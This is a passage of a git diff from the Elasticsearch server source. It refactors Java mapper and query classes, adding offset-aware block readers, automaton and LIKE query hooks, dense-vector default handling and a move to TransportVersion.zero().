(hasNormalizer()) { @@ -1322,7 +1342,7 @@ protected BytesRef preserve(BytesRef value) { } if (fieldType().ignoreAbove != Integer.MAX_VALUE) { - layers.add(new CompositeSyntheticFieldLoader.StoredFieldLayer(originalName()) { + layers.add(new CompositeSyntheticFieldLoader.StoredFieldLayer(originalName) { @Override protected void writeValue(Object value, XContentBuilder b) throws IOException { BytesRef ref = (BytesRef) value; diff --git a/server/src/main/java/org/elasticsearch/index/mapper/KeywordScriptBlockDocValuesReader.java b/server/src/main/java/org/elasticsearch/index/mapper/KeywordScriptBlockDocValuesReader.java index cfc7045a55513..220bba3d3c079 100644 --- a/server/src/main/java/org/elasticsearch/index/mapper/KeywordScriptBlockDocValuesReader.java +++ b/server/src/main/java/org/elasticsearch/index/mapper/KeywordScriptBlockDocValuesReader.java @@ -51,10 +51,10 @@ public int docId() { } @Override - public BlockLoader.Block read(BlockLoader.BlockFactory factory, BlockLoader.Docs docs) throws IOException { + public BlockLoader.Block read(BlockLoader.BlockFactory factory, BlockLoader.Docs docs, int offset) throws IOException { // Note that we don't pre-sort our output so we can't use bytesRefsFromDocValues - try (BlockLoader.BytesRefBuilder builder = factory.bytesRefs(docs.count())) { - for (int i = 0; i < docs.count(); i++) { + try (BlockLoader.BytesRefBuilder builder = factory.bytesRefs(docs.count() - offset)) { + for (int i = offset; i < docs.count(); i++) { read(docs.get(i), builder); } return builder.build(); diff --git a/server/src/main/java/org/elasticsearch/index/mapper/LongScriptBlockDocValuesReader.java b/server/src/main/java/org/elasticsearch/index/mapper/LongScriptBlockDocValuesReader.java index 0a1a8a86154ab..9c947a17de7b6 100644 --- a/server/src/main/java/org/elasticsearch/index/mapper/LongScriptBlockDocValuesReader.java +++ b/server/src/main/java/org/elasticsearch/index/mapper/LongScriptBlockDocValuesReader.java @@ -49,10 +49,10 @@ public int docId() { } @Override - public BlockLoader.Block read(BlockLoader.BlockFactory factory, BlockLoader.Docs docs) throws IOException { + public BlockLoader.Block read(BlockLoader.BlockFactory factory, BlockLoader.Docs docs, int offset) throws IOException { // Note that we don't pre-sort our output so we can't use longsFromDocValues - try (BlockLoader.LongBuilder builder = factory.longs(docs.count())) { - for (int i = 0; i < docs.count(); i++) { + try (BlockLoader.LongBuilder builder = factory.longs(docs.count() - offset)) { + for (int i = offset; i < docs.count(); i++) { read(docs.get(i), builder); } return builder.build(); diff --git a/server/src/main/java/org/elasticsearch/index/mapper/MappedFieldType.java b/server/src/main/java/org/elasticsearch/index/mapper/MappedFieldType.java index a9e67be4085dd..87877f926983e 100644 --- a/server/src/main/java/org/elasticsearch/index/mapper/MappedFieldType.java +++ b/server/src/main/java/org/elasticsearch/index/mapper/MappedFieldType.java @@ -25,6 +25,8 @@ import org.apache.lucene.search.Query; import org.apache.lucene.search.TermQuery; import org.apache.lucene.util.BytesRef; +import org.apache.lucene.util.automaton.Automaton; +import org.apache.lucene.util.automaton.CharacterRunAutomaton; import org.elasticsearch.ElasticsearchException; import org.elasticsearch.ElasticsearchParseException; import org.elasticsearch.cluster.metadata.IndexMetadata; @@ -54,6 +56,7 @@ import java.util.Objects; import java.util.Set; import java.util.function.Function; +import java.util.function.Supplier; import static org.elasticsearch.search.SearchService.ALLOW_EXPENSIVE_QUERIES; @@ -329,6 +332,19 @@ public final Query wildcardQuery(String value, @Nullable MultiTermQuery.RewriteM return wildcardQuery(value, method, false, context); } + /** + * Similar to wildcardQuery, except that we change the behavior for ESQL + * to behave like a string LIKE query, where the value is matched as a string + */ + public Query wildcardLikeQuery( + String value, + @Nullable MultiTermQuery.RewriteMethod method, + boolean caseInsensitve, + SearchExecutionContext context + ) { + return wildcardQuery(value, method, caseInsensitve, context); + } + public Query wildcardQuery( String value, @Nullable MultiTermQuery.RewriteMethod method, @@ -370,6 +386,23 @@ public Query regexpQuery( ); } + /** + * Returns a Lucine pushable Query for the current field + * For now can only be AutomatonQuery or MatchAllDocsQuery() or MatchNoDocsQuery() + */ + public Query automatonQuery( + Supplier automatonSupplier, + Supplier characterRunAutomatonSupplier, + @Nullable MultiTermQuery.RewriteMethod method, + SearchExecutionContext context, + String description + ) { + throw new QueryShardException( + context, + "Can only use automaton queries on keyword fields - not on [" + name + "] which is of type [" + typeName() + "]" + ); + } + public Query existsQuery(SearchExecutionContext context) { if (hasDocValues() || getTextSearchInfo().hasNorms()) { return new FieldExistsQuery(name()); diff --git a/server/src/main/java/org/elasticsearch/index/mapper/MapperFeatures.java b/server/src/main/java/org/elasticsearch/index/mapper/MapperFeatures.java index 8817acf3b8e64..0c6a3dbd00e6e 100644 --- a/server/src/main/java/org/elasticsearch/index/mapper/MapperFeatures.java +++ b/server/src/main/java/org/elasticsearch/index/mapper/MapperFeatures.java @@ -45,6 +45,7 @@ public class MapperFeatures implements FeatureSpecification { static final NodeFeature IVF_FORMAT_CLUSTER_FEATURE = new NodeFeature("mapper.ivf_format_cluster_feature"); static final NodeFeature IVF_NESTED_SUPPORT = new NodeFeature("mapper.ivf_nested_support"); static final NodeFeature SEARCH_LOAD_PER_SHARD = new NodeFeature("mapper.search_load_per_shard"); + static final NodeFeature PATTERNED_TEXT = new NodeFeature("mapper.patterned_text"); @Override public Set getTestFeatures() { @@ -76,7 +77,8 @@ public Set getTestFeatures() { IVF_FORMAT_CLUSTER_FEATURE, IVF_NESTED_SUPPORT, SEARCH_LOAD_PER_SHARD, - SPARSE_VECTOR_INDEX_OPTIONS_FEATURE + SPARSE_VECTOR_INDEX_OPTIONS_FEATURE, + PATTERNED_TEXT ); } } diff --git a/server/src/main/java/org/elasticsearch/index/mapper/NestedValueFetcher.java b/server/src/main/java/org/elasticsearch/index/mapper/NestedValueFetcher.java index df9e348dc9fbc..008bbdbd0005b 100644 --- a/server/src/main/java/org/elasticsearch/index/mapper/NestedValueFetcher.java +++ b/server/src/main/java/org/elasticsearch/index/mapper/NestedValueFetcher.java @@ -42,7 +42,7 @@ public NestedValueFetcher(String nestedField, FieldFetcher nestedFieldFetcher) { @Override public List fetchValues(Source source, int doc, List includedValues) throws IOException { - List nestedEntriesToReturn = new ArrayList<>(); + ArrayList nestedEntriesToReturn = new ArrayList<>(); Map filteredSource = new HashMap<>(); Map stub = createSourceMapStub(filteredSource); List nestedValues = XContentMapValues.extractNestedSources(nestedFieldPath, source.source()); @@ -69,6 +69,7 @@ public List fetchValues(Source source, int doc, List includedVal nestedEntriesToReturn.add(nestedEntry); } } + nestedEntriesToReturn.trimToSize(); return nestedEntriesToReturn; } diff --git a/server/src/main/java/org/elasticsearch/index/mapper/RangeFieldMapper.java b/server/src/main/java/org/elasticsearch/index/mapper/RangeFieldMapper.java index 79a0e6b1fdbc4..e53fc3cba5d58 100644 --- a/server/src/main/java/org/elasticsearch/index/mapper/RangeFieldMapper.java +++ b/server/src/main/java/org/elasticsearch/index/mapper/RangeFieldMapper.java @@ -10,6 +10,7 @@ package org.elasticsearch.index.mapper; import org.apache.lucene.search.Query; +import org.apache.lucene.search.SortField; import org.apache.lucene.util.BytesRef; import org.elasticsearch.ElasticsearchException; import org.elasticsearch.common.Explicit; @@ -20,13 +21,17 @@ import org.elasticsearch.common.time.DateFormatter; import org.elasticsearch.common.time.DateMathParser; import org.elasticsearch.common.util.LocaleUtils; +import org.elasticsearch.core.Nullable; import org.elasticsearch.core.Tuple; import org.elasticsearch.features.NodeFeature; import org.elasticsearch.index.fielddata.FieldDataContext; import org.elasticsearch.index.fielddata.IndexFieldData; +import org.elasticsearch.index.fielddata.IndexFieldDataCache; import org.elasticsearch.index.fielddata.plain.BinaryIndexFieldData; import org.elasticsearch.index.query.SearchExecutionContext; +import org.elasticsearch.indices.breaker.CircuitBreakerService; import org.elasticsearch.search.DocValueFormat; +import org.elasticsearch.search.MultiValueMode; import org.elasticsearch.search.aggregations.support.CoreValuesSourceType; import org.elasticsearch.xcontent.XContentBuilder; import org.elasticsearch.xcontent.XContentParser; @@ -227,7 +232,22 @@ public RangeType rangeType() { @Override public IndexFieldData.Builder fielddataBuilder(FieldDataContext fieldDataContext) { failIfNoDocValues(); - return new BinaryIndexFieldData.Builder(name(), CoreValuesSourceType.RANGE); + return new BinaryIndexFieldData.Builder(name(), CoreValuesSourceType.RANGE) { + @Override + public BinaryIndexFieldData build(IndexFieldDataCache cache, CircuitBreakerService breakerService) { + return new BinaryIndexFieldData(name(), CoreValuesSourceType.RANGE) { + @Override + public SortField sortField( + @Nullable Object missingValue, + MultiValueMode sortMode, + XFieldComparatorSource.Nested nested, + boolean reverse + ) { + throw new IllegalArgumentException("Sorting by range field [" + name() + "] is not supported"); + } + }; + } + }; } @Override diff --git a/server/src/main/java/org/elasticsearch/index/mapper/SourceValueFetcher.java b/server/src/main/java/org/elasticsearch/index/mapper/SourceValueFetcher.java index a65a3cd017954..7d1e722200ba3 100644 --- a/server/src/main/java/org/elasticsearch/index/mapper/SourceValueFetcher.java +++ b/server/src/main/java/org/elasticsearch/index/mapper/SourceValueFetcher.java @@ -55,7 +55,7 @@ public SourceValueFetcher(Set sourcePaths, Object nullValue) { @Override public List fetchValues(Source source, int doc, List ignoredValues) { - List values = new ArrayList<>(); + ArrayList values = new ArrayList<>(); for (String path : sourcePaths) { Object sourceValue = source.extractValue(path, nullValue); if (sourceValue == null) { @@ -92,6 +92,7 @@ public List fetchValues(Source source, int doc, List ignoredValu } } } + values.trimToSize(); return values; } diff --git a/server/src/main/java/org/elasticsearch/index/mapper/flattened/FlattenedFieldSyntheticWriterHelper.java b/server/src/main/java/org/elasticsearch/index/mapper/flattened/FlattenedFieldSyntheticWriterHelper.java index 0cbddf3044c75..5493bcddb4a84 100644 --- a/server/src/main/java/org/elasticsearch/index/mapper/flattened/FlattenedFieldSyntheticWriterHelper.java +++ b/server/src/main/java/org/elasticsearch/index/mapper/flattened/FlattenedFieldSyntheticWriterHelper.java @@ -116,7 +116,9 @@ private KeyValue(final String value, final Prefix prefix, final String leaf) { KeyValue(final BytesRef keyValue) { this( - FlattenedFieldParser.extractKey(keyValue).utf8ToString().split(PATH_SEPARATOR_PATTERN), + // Splitting with a negative limit includes trailing empty strings. + // This is needed in case the provide path has trailing path separators. + FlattenedFieldParser.extractKey(keyValue).utf8ToString().split(PATH_SEPARATOR_PATTERN, -1), FlattenedFieldParser.extractValue(keyValue).utf8ToString() ); } diff --git a/server/src/main/java/org/elasticsearch/index/mapper/vectors/DenseVectorFieldMapper.java b/server/src/main/java/org/elasticsearch/index/mapper/vectors/DenseVectorFieldMapper.java index 329e426be7f47..1189d7c2b28e3 100644 --- a/server/src/main/java/org/elasticsearch/index/mapper/vectors/DenseVectorFieldMapper.java +++ b/server/src/main/java/org/elasticsearch/index/mapper/vectors/DenseVectorFieldMapper.java @@ -31,6 +31,7 @@ import org.apache.lucene.index.VectorEncoding; import org.apache.lucene.index.VectorSimilarityFunction; import org.apache.lucene.search.FieldExistsQuery; +import org.apache.lucene.search.MatchNoDocsQuery; import org.apache.lucene.search.Query; import org.apache.lucene.search.join.BitSetProducer; import org.apache.lucene.search.knn.KnnSearchStrategy; @@ -327,7 +328,9 @@ public Builder(String name, IndexVersion indexVersionCreated) { || previous.updatableTo(current) ); if (defaultInt8Hnsw || defaultBBQ8Hnsw) { - this.indexOptions.alwaysSerialize(); + if (defaultBBQ8Hnsw == false || (dims != null && dims.isConfigured())) { + this.indexOptions.alwaysSerialize(); + } } this.indexed.addValidator(v -> { if (v) { @@ -350,21 +353,31 @@ public Builder(String name, IndexVersion indexVersionCreated) { } private DenseVectorIndexOptions defaultIndexOptions(boolean defaultInt8Hnsw, boolean defaultBBQHnsw) { - if (this.dims != null && this.dims.isConfigured() && elementType.getValue() == ElementType.FLOAT && this.indexed.getValue()) { - if (defaultBBQHnsw && this.dims.getValue() >= BBQ_DIMS_DEFAULT_THRESHOLD) { - return new BBQHnswIndexOptions( - Lucene99HnswVectorsFormat.DEFAULT_MAX_CONN, - Lucene99HnswVectorsFormat.DEFAULT_BEAM_WIDTH, - new RescoreVector(DEFAULT_OVERSAMPLE) - ); - } else if (defaultInt8Hnsw) { - return new Int8HnswIndexOptions( - Lucene99HnswVectorsFormat.DEFAULT_MAX_CONN, - Lucene99HnswVectorsFormat.DEFAULT_BEAM_WIDTH, - null, - null - ); - } + if (elementType.getValue() != ElementType.FLOAT || indexed.getValue() == false) { + return null; + } + + boolean dimIsConfigured = dims != null && dims.isConfigured(); + if (defaultBBQHnsw && dimIsConfigured == false) { + // Delay selecting the default index options until dimensions are configured. + // This applies only to indices that are eligible to use BBQ as the default, + // since prior to this change, the default was selected eagerly. + return null; + } + + if (defaultBBQHnsw && dimIsConfigured && dims.getValue() >= BBQ_DIMS_DEFAULT_THRESHOLD) { + return new BBQHnswIndexOptions( + Lucene99HnswVectorsFormat.DEFAULT_MAX_CONN, + Lucene99HnswVectorsFormat.DEFAULT_BEAM_WIDTH, + new RescoreVector(DEFAULT_OVERSAMPLE) + ); + } else if (defaultInt8Hnsw) { + return new Int8HnswIndexOptions( + Lucene99HnswVectorsFormat.DEFAULT_MAX_CONN, + Lucene99HnswVectorsFormat.DEFAULT_BEAM_WIDTH, + null, + null + ); } return null; } @@ -2434,6 +2447,9 @@ public Query createKnnQuery( "to perform knn search on field [" + name() + "], its mapping must have [index] set to [true]" ); } + if (dims == null) { + return new MatchNoDocsQuery("No data has been indexed for field [" + name() + "]"); + } KnnSearchStrategy knnSearchStrategy = heuristic.getKnnSearchStrategy(); return switch (getElementType()) { case BYTE -> createKnnByteQuery( @@ -2713,47 +2729,9 @@ public void parse(DocumentParserContext context) throws IOException { } if (fieldType().dims == null) { int dims = fieldType().elementType.parseDimensionCount(context); - ; - final boolean defaultInt8Hnsw = indexCreatedVersion.onOrAfter(IndexVersions.DEFAULT_DENSE_VECTOR_TO_INT8_HNSW); - final boolean defaultBBQ8Hnsw = indexCreatedVersion.onOrAfter(IndexVersions.DEFAULT_DENSE_VECTOR_TO_BBQ_HNSW); - DenseVectorIndexOptions denseVectorIndexOptions = fieldType().indexOptions; - if (denseVectorIndexOptions == null && fieldType().getElementType() == ElementType.FLOAT && fieldType().isIndexed()) { - if (defaultBBQ8Hnsw && dims >= BBQ_DIMS_DEFAULT_THRESHOLD) { - denseVectorIndexOptions = new BBQHnswIndexOptions( - Lucene99HnswVectorsFormat.DEFAULT_MAX_CONN, - Lucene99HnswVectorsFormat.DEFAULT_BEAM_WIDTH, - new RescoreVector(DEFAULT_OVERSAMPLE) - ); - } else if (defaultInt8Hnsw) { - denseVectorIndexOptions = new Int8HnswIndexOptions( - Lucene99HnswVectorsFormat.DEFAULT_MAX_CONN, - Lucene99HnswVectorsFormat.DEFAULT_BEAM_WIDTH, - null, - null - ); - } - } - if (denseVectorIndexOptions != null) { - denseVectorIndexOptions.validateDimension(dims); - } - DenseVectorFieldType updatedDenseVectorFieldType = new DenseVectorFieldType( - fieldType().name(), - indexCreatedVersion, - fieldType().elementType, - dims, - fieldType().indexed, - fieldType().similarity, - denseVectorIndexOptions, - fieldType().meta(), - fieldType().isSyntheticSource - ); - Mapper update = new DenseVectorFieldMapper( - leafName(), - updatedDenseVectorFieldType, - builderParams, - denseVectorIndexOptions, - indexCreatedVersion - ); + DenseVectorFieldMapper.Builder builder = (Builder) getMergeBuilder(); + builder.dimensions(dims); + Mapper update = builder.build(context.createDynamicMapperBuilderContext()); context.addDynamicMapper(update); return; } diff --git a/server/src/main/java/org/elasticsearch/index/query/AutomatonQueryBuilder.java b/server/src/main/java/org/elasticsearch/index/query/AutomatonQueryBuilder.java deleted file mode 100644 index 9c6331044e6d5..0000000000000 --- a/server/src/main/java/org/elasticsearch/index/query/AutomatonQueryBuilder.java +++ /dev/null @@ -1,104 +0,0 @@ -/* - * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one - * or more contributor license agreements. Licensed under the "Elastic License - * 2.0", the "GNU Affero General Public License v3.0 only", and the "Server Side - * Public License v 1"; you may not use this file except in compliance with, at - * your election, the "Elastic License 2.0", the "GNU Affero General Public - * License v3.0 only", or the "Server Side Public License, v 1". - */ - -package org.elasticsearch.index.query; - -import org.apache.lucene.index.Term; -import org.apache.lucene.search.AutomatonQuery; -import org.apache.lucene.search.Query; -import org.apache.lucene.util.automaton.Automaton; -import org.elasticsearch.TransportVersion; -import org.elasticsearch.common.Strings; -import org.elasticsearch.common.io.stream.StreamOutput; -import org.elasticsearch.xcontent.XContentBuilder; - -import java.io.IOException; -import java.io.UnsupportedEncodingException; -import java.util.Objects; - -/** - * Implements an Automaton query, which matches documents based on a Lucene Automaton. - * It does not support serialization or XContent representation. - */ -public class AutomatonQueryBuilder extends AbstractQueryBuilder implements MultiTermQueryBuilder { - private final String fieldName; - private final Automaton automaton; - private final String description; - - public AutomatonQueryBuilder(String fieldName, Automaton automaton, String description) { - if (Strings.isEmpty(fieldName)) { - throw new IllegalArgumentException("field name is null or empty"); - } - if (automaton == null) { - throw new IllegalArgumentException("automaton cannot be null"); - } - this.fieldName = fieldName; - this.automaton = automaton; - this.description = description; - } - - @Override - public String fieldName() { - return fieldName; - } - - @Override - public String getWriteableName() { - throw new UnsupportedOperationException("AutomatonQueryBuilder does not support getWriteableName"); - } - - @Override - protected void doWriteTo(StreamOutput out) throws IOException { - throw new UnsupportedEncodingException("AutomatonQueryBuilder does not support doWriteTo"); - } - - @Override - protected void doXContent(XContentBuilder builder, Params params) throws IOException { - throw new UnsupportedEncodingException("AutomatonQueryBuilder does not support doXContent"); - } - - @Override - protected Query doToQuery(SearchExecutionContext context) throws IOException { - return new AutomatonQueryWithDescription(new Term(fieldName), automaton, description); - } - - @Override - protected int doHashCode() { - return Objects.hash(fieldName, automaton, description); - } - - @Override - protected boolean doEquals(AutomatonQueryBuilder other) { - return Objects.equals(fieldName, other.fieldName) - && Objects.equals(automaton, other.automaton) - && Objects.equals(description, other.description); - } - - @Override - public TransportVersion getMinimalSupportedVersion() { - throw new UnsupportedOperationException("AutomatonQueryBuilder does not support getMinimalSupportedVersion"); - } - - static class AutomatonQueryWithDescription extends AutomatonQuery { - private final String description; - - AutomatonQueryWithDescription(Term term, Automaton automaton, String description) { - super(term, automaton); - this.description = description; - } - - @Override - public String toString(String field) { - if (this.field.equals(field)) { - return description; - } - return this.field + ":" + description; - } - } -} diff --git a/server/src/main/java/org/elasticsearch/index/query/AutomatonQueryWithDescription.java b/server/src/main/java/org/elasticsearch/index/query/AutomatonQueryWithDescription.java new file mode 100644 index 0000000000000..78c285470e3b6 --- /dev/null +++ b/server/src/main/java/org/elasticsearch/index/query/AutomatonQueryWithDescription.java @@ -0,0 +1,36 @@ +/* + * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one + * or more contributor license agreements. Licensed under the "Elastic License + * 2.0", the "GNU Affero General Public License v3.0 only", and the "Server Side + * Public License v 1"; you may not use this file except in compliance with, at + * your election, the "Elastic License 2.0", the "GNU Affero General Public + * License v3.0 only", or the "Server Side Public License, v 1". + */ + +package org.elasticsearch.index.query; + +import org.apache.lucene.index.Term; +import org.apache.lucene.search.AutomatonQuery; +import org.apache.lucene.util.automaton.Automaton; + +/** + * A specialized {@link AutomatonQuery} that includes a description of the query. + * This can be useful for debugging or logging purposes, providing more context + * about the query being executed. + */ +public class AutomatonQueryWithDescription extends AutomatonQuery { + private final String description; + + public AutomatonQueryWithDescription(Term term, Automaton automaton, String description) { + super(term, automaton); + this.description = description; + } + + @Override + public String toString(String field) { + if (this.field.equals(field)) { + return description; + } + return this.field + ":" + description; + } +} diff --git a/server/src/main/java/org/elasticsearch/index/query/BoolQueryBuilder.java b/server/src/main/java/org/elasticsearch/index/query/BoolQueryBuilder.java index 5329dbf01975a..1225a070a7c00 100644 --- a/server/src/main/java/org/elasticsearch/index/query/BoolQueryBuilder.java +++ b/server/src/main/java/org/elasticsearch/index/query/BoolQueryBuilder.java @@ -15,7 +15,6 @@ import org.apache.lucene.search.MatchAllDocsQuery; import org.apache.lucene.search.Query; import org.elasticsearch.TransportVersion; -import org.elasticsearch.TransportVersions; import org.elasticsearch.common.ParsingException; import org.elasticsearch.common.io.stream.StreamInput; import org.elasticsearch.common.io.stream.StreamOutput; @@ -407,7 +406,7 @@ private static boolean rewriteClauses( @Override public TransportVersion getMinimalSupportedVersion() { - return TransportVersions.ZERO; + return TransportVersion.zero(); } /** diff --git a/server/src/main/java/org/elasticsearch/index/query/BoostingQueryBuilder.java b/server/src/main/java/org/elasticsearch/index/query/BoostingQueryBuilder.java index eb5de17165e2d..9e439efd71dc9 100644 --- a/server/src/main/java/org/elasticsearch/index/query/BoostingQueryBuilder.java +++ b/server/src/main/java/org/elasticsearch/index/query/BoostingQueryBuilder.java @@ -12,7 +12,6 @@ import org.apache.lucene.queries.function.FunctionScoreQuery; import org.apache.lucene.search.Query; import org.elasticsearch.TransportVersion; -import org.elasticsearch.TransportVersions; import org.elasticsearch.common.ParsingException; import org.elasticsearch.common.io.stream.StreamInput; import org.elasticsearch.common.io.stream.StreamOutput; @@ -232,6 +231,6 @@ protected void extractInnerHitBuilders(Map inner @Override public TransportVersion getMinimalSupportedVersion() { - return TransportVersions.ZERO; + return TransportVersion.zero(); } } diff --git a/server/src/main/java/org/elasticsearch/index/query/CombinedFieldsQueryBuilder.java b/server/src/main/java/org/elasticsearch/index/query/CombinedFieldsQueryBuilder.java index c4c18607e6650..5c93d8c85d4f3 100644 --- a/server/src/main/java/org/elasticsearch/index/query/CombinedFieldsQueryBuilder.java +++ b/server/src/main/java/org/elasticsearch/index/query/CombinedFieldsQueryBuilder.java @@ -23,7 +23,6 @@ import org.apache.lucene.util.BytesRef; import org.apache.lucene.util.QueryBuilder; import org.elasticsearch.TransportVersion; -import org.elasticsearch.TransportVersions; import org.elasticsearch.common.Strings; import org.elasticsearch.common.io.stream.StreamInput; import org.elasticsearch.common.io.stream.StreamOutput; @@ -449,6 +448,6 @@ protected boolean doEquals(CombinedFieldsQueryBuilder other) { @Override public TransportVersion getMinimalSupportedVersion() { - return TransportVersions.ZERO; + return TransportVersion.zero(); } } diff --git a/server/src/main/java/org/elasticsearch/index/query/ConstantScoreQueryBuilder.java b/server/src/main/java/org/elasticsearch/index/query/ConstantScoreQueryBuilder.java index faae3c0c424a9..f70f095ecd5ea 100644 --- a/server/src/main/java/org/elasticsearch/index/query/ConstantScoreQueryBuilder.java +++ b/server/src/main/java/org/elasticsearch/index/query/ConstantScoreQueryBuilder.java @@ -12,7 +12,6 @@ import org.apache.lucene.search.ConstantScoreQuery; import org.apache.lucene.search.Query; import org.elasticsearch.TransportVersion; -import org.elasticsearch.TransportVersions; import org.elasticsearch.common.ParsingException; import org.elasticsearch.common.io.stream.StreamInput; import org.elasticsearch.common.io.stream.StreamOutput; @@ -163,6 +162,6 @@ protected void extractInnerHitBuilders(Map inner @Override public TransportVersion getMinimalSupportedVersion() { - return TransportVersions.ZERO; + return TransportVersion.zero(); } } diff --git a/server/src/main/java/org/elasticsearch/index/query/CoordinatorRewriteContext.java b/server/src/main/java/org/elasticsearch/index/query/CoordinatorRewriteContext.java index fd1f39a70d525..e0cfd86c10c6d 100644 --- a/server/src/main/java/org/elasticsearch/index/query/CoordinatorRewriteContext.java +++ b/server/src/main/java/org/elasticsearch/index/query/CoordinatorRewriteContext.java @@ -72,6 +72,11 @@ protected boolean matches(String pattern, boolean caseInsensitive, QueryRewriteC return Regex.simpleMatch(pattern, tierPreference); } + @Override + public String getConstantFieldValue(SearchExecutionContext context) { + return context.getTierPreference(); + } + @Override public Query existsQuery(SearchExecutionContext context) { throw new UnsupportedOperationException("field exists query is not supported on the coordinator node"); diff --git a/server/src/main/java/org/elasticsearch/index/query/DisMaxQueryBuilder.java b/server/src/main/java/org/elasticsearch/index/query/DisMaxQueryBuilder.java index e37b6c89d2be6..4ddb28b76ee6c 100644 --- a/server/src/main/java/org/elasticsearch/index/query/DisMaxQueryBuilder.java +++ b/server/src/main/java/org/elasticsearch/index/query/DisMaxQueryBuilder.java @@ -12,7 +12,6 @@ import org.apache.lucene.search.DisjunctionMaxQuery; import org.apache.lucene.search.Query; import org.elasticsearch.TransportVersion; -import org.elasticsearch.TransportVersions; import org.elasticsearch.common.ParsingException; import org.elasticsearch.common.io.stream.StreamInput; import org.elasticsearch.common.io.stream.StreamOutput; @@ -226,6 +225,6 @@ protected void extractInnerHitBuilders(Map inner @Override public TransportVersion getMinimalSupportedVersion() { - return TransportVersions.ZERO; + return TransportVersion.zero(); } } diff --git a/server/src/main/java/org/elasticsearch/index/query/DistanceFeatureQueryBuilder.java b/server/src/main/java/org/elasticsearch/index/query/DistanceFeatureQueryBuilder.java index 919b2852aee43..a89064072f259 100644 --- a/server/src/main/java/org/elasticsearch/index/query/DistanceFeatureQueryBuilder.java +++ b/server/src/main/java/org/elasticsearch/index/query/DistanceFeatureQueryBuilder.java @@ -11,7 +11,6 @@ import org.apache.lucene.search.Query; import org.elasticsearch.TransportVersion; -import org.elasticsearch.TransportVersions; import org.elasticsearch.common.ParsingException; import org.elasticsearch.common.geo.GeoPoint; import org.elasticsearch.common.geo.GeoUtils; @@ -201,6 +200,6 @@ public String toString() { @Override public TransportVersion getMinimalSupportedVersion() { - return TransportVersions.ZERO; + return TransportVersion.zero(); } } diff --git a/server/src/main/java/org/elasticsearch/index/query/ExistsQueryBuilder.java b/server/src/main/java/org/elasticsearch/index/query/ExistsQueryBuilder.java index fb96f85835548..3b596ed8b6d4c 100644 --- a/server/src/main/java/org/elasticsearch/index/query/ExistsQueryBuilder.java +++ b/server/src/main/java/org/elasticsearch/index/query/ExistsQueryBuilder.java @@ -15,7 +15,6 @@ import org.apache.lucene.search.MatchNoDocsQuery; import org.apache.lucene.search.Query; import org.elasticsearch.TransportVersion; -import org.elasticsearch.TransportVersions; import org.elasticsearch.common.ParsingException; import org.elasticsearch.common.Strings; import org.elasticsearch.common.io.stream.StreamInput; @@ -179,6 +178,6 @@ public String getWriteableName() { @Override public TransportVersion getMinimalSupportedVersion() { - return TransportVersions.ZERO; + return TransportVersion.zero(); } } diff --git a/server/src/main/java/org/elasticsearch/index/query/FieldMaskingSpanQueryBuilder.java b/server/src/main/java/org/elasticsearch/index/query/FieldMaskingSpanQueryBuilder.java index d709ca42a7b9e..cc2a05b8ed2bd 100644 --- a/server/src/main/java/org/elasticsearch/index/query/FieldMaskingSpanQueryBuilder.java +++ b/server/src/main/java/org/elasticsearch/index/query/FieldMaskingSpanQueryBuilder.java @@ -13,7 +13,6 @@ import org.apache.lucene.queries.spans.SpanQuery; import org.apache.lucene.search.Query; import org.elasticsearch.TransportVersion; -import org.elasticsearch.TransportVersions; import org.elasticsearch.common.ParsingException; import org.elasticsearch.common.Strings; import org.elasticsearch.common.io.stream.StreamInput; @@ -179,6 +178,6 @@ public String getWriteableName() { @Override public TransportVersion getMinimalSupportedVersion() { - return TransportVersions.ZERO; + return TransportVersion.zero(); } } diff --git a/server/src/main/java/org/elasticsearch/index/query/FuzzyQueryBuilder.java b/server/src/main/java/org/elasticsearch/index/query/FuzzyQueryBuilder.java index ada82b7a37c91..13ebb8e19322e 100644 --- a/server/src/main/java/org/elasticsearch/index/query/FuzzyQueryBuilder.java +++ b/server/src/main/java/org/elasticsearch/index/query/FuzzyQueryBuilder.java @@ -12,7 +12,6 @@ import org.apache.lucene.search.FuzzyQuery; import org.apache.lucene.search.Query; import org.elasticsearch.TransportVersion; -import org.elasticsearch.TransportVersions; import org.elasticsearch.common.ParsingException; import org.elasticsearch.common.Strings; import org.elasticsearch.common.io.stream.StreamInput; @@ -300,6 +299,6 @@ protected boolean doEquals(FuzzyQueryBuilder other) { @Override public TransportVersion getMinimalSupportedVersion() { - return TransportVersions.ZERO; + return TransportVersion.zero(); } } diff --git a/server/src/main/java/org/elasticsearch/index/query/GeoBoundingBoxQueryBuilder.java b/server/src/main/java/org/elasticsearch/index/query/GeoBoundingBoxQueryBuilder.java index e91be82730222..254f70aeaeba2 100644 --- a/server/src/main/java/org/elasticsearch/index/query/GeoBoundingBoxQueryBuilder.java +++ b/server/src/main/java/org/elasticsearch/index/query/GeoBoundingBoxQueryBuilder.java @@ -382,6 +382,6 @@ public String getWriteableName() { @Override public TransportVersion getMinimalSupportedVersion() { - return TransportVersions.ZERO; + return TransportVersion.zero(); } } diff --git a/server/src/main/java/org/elasticsearch/index/query/GeoDistanceQueryBuilder.java b/server/src/main/java/org/elasticsearch/index/query/GeoDistanceQueryBuilder.java index 14271fb01696a..93e6c0a8bd6b0 100644 --- a/server/src/main/java/org/elasticsearch/index/query/GeoDistanceQueryBuilder.java +++ b/server/src/main/java/org/elasticsearch/index/query/GeoDistanceQueryBuilder.java @@ -12,7 +12,6 @@ import org.apache.lucene.search.MatchNoDocsQuery; import org.apache.lucene.search.Query; import org.elasticsearch.TransportVersion; -import org.elasticsearch.TransportVersions; import org.elasticsearch.common.ParsingException; import org.elasticsearch.common.Strings; import org.elasticsearch.common.geo.GeoDistance; @@ -385,6 +384,6 @@ public String getWriteableName() { @Override public TransportVersion getMinimalSupportedVersion() { - return TransportVersions.ZERO; + return TransportVersion.zero(); } } diff --git a/server/src/main/java/org/elasticsearch/index/query/GeoPolygonQueryBuilder.java b/server/src/main/java/org/elasticsearch/index/query/GeoPolygonQueryBuilder.java index 4cddf8f91ab3f..d113d6b9ba82b 100644 --- a/server/src/main/java/org/elasticsearch/index/query/GeoPolygonQueryBuilder.java +++ b/server/src/main/java/org/elasticsearch/index/query/GeoPolygonQueryBuilder.java @@ -16,7 +16,6 @@ import org.apache.lucene.search.MatchNoDocsQuery; import org.apache.lucene.search.Query; import org.elasticsearch.TransportVersion; -import org.elasticsearch.TransportVersions; import org.elasticsearch.common.ParsingException; import org.elasticsearch.common.Strings; import org.elasticsearch.common.geo.GeoPoint; @@ -319,6 +318,6 @@ public String 